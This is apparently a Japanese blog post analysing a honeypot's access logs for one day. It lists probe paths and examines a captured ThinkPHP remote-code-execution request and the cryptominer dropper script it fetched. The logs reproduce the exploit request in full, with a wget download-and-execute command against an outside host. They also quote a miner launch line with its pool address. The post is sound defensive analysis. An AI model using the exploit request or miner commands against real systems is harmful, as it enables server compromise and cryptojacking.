honeypotの簡易解析17日目

2019-04-17のアクセス数は442件でした。

■送信元IPアドレスの数は 82件です。

■メソッドの一覧と件数は以下です。

method総数
GET374
HEAD1
POST67
合計 結果442

■アクセスパス一覧と件数は以下です。

pathmethod総数
/ GET41
/ HEAD1
///?author=1GET1
///wp-json/wp/v2/users/GET1
/GponForm/diag_Form?images/POST1
/index.php?s=/index/\think\app/invokefunction&function=
call_user_func_array&vars[0]=shell_exec&vars[1][]=
wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a
GET1
/manager/htmlGET282
/phpmy/scripts/setup.phpGET2
/phpMyAdmin/scripts/setup.phpGET5
/pma/scripts/setup.phpGET2
/tmUnblock.cgiPOST2
/TP/public/index.phpGET1
/TP/public/index.php?s=index/\think\app/invokefunction&
function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
GET1
/w00tw00t.at.blackhats.romanian.anti-sec:)GET2
/wp-login.phpGET33
/wp-login.phpPOST32
/xmlrpc.phpPOST32
http://112.35.63.31:8088/index.phpGET1
http://112.35.66.7:8088/index.phpGET1

気になるlog

-=-=313件目のlog=-=-

[2019-04-17 10:24:59+0900] 123.56.49.19 ほげ:80 "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 False 
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
 Host: ほげ
 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
 Connection: keep-alive

検体はシェルスクリプト。VTの結果はこちら

このシェルスクリプト、ダウンローダーでxmrig_sというファイル名のマルウェアを落として来るんだけど、自分が感染しているか確認し、感染していたら自身のプロセスを殺して、新たにダウンロードしてくる!

最初に”crontab -r”を実行している。落としてくるマルウェアがcrontabを利用するのだろう。

落としたファイルはELFの64bitでvirustotalはこちら

コインマイナーである。

そして気づいたのがシェルスクリプトにあった以下の行。

	if [ "$(ps -eo comm | grep -c "xmri[g]")" -lt "2" ]; then
		/tmp/xmrig_s -r 1000 --donate-level 1 -o 119[.]23[.]222[.]239[:]26590 -B -p pass -k --max-cpu-usage=99 ;

“comm”は、コマンド名。grep -c はFILE ごとに一致した行数のみ表示するみたい。

引数の一部に

”-max-cpu-usage=99”

cpuが99%まで使えって事なのか。

IPアドレスはマイニングの送付先と推測できます。(ELF解析しろよって突っ込まないで)

コインマイナーとシェルスクリプトのVirusTotalの検知件数に差が乖離しています。

おそらく攻撃者は本体にハードコートして送り先を埋めるのではなく、

シェルスクリプトをペロペロ変更して、コインマイナーのlifetimeを伸ばす工夫をしているんだろうな。

検体だけ調査しても通信先が解らないって事か。

インシデント対応時は、しっかり証拠保全しましょうって話ですね。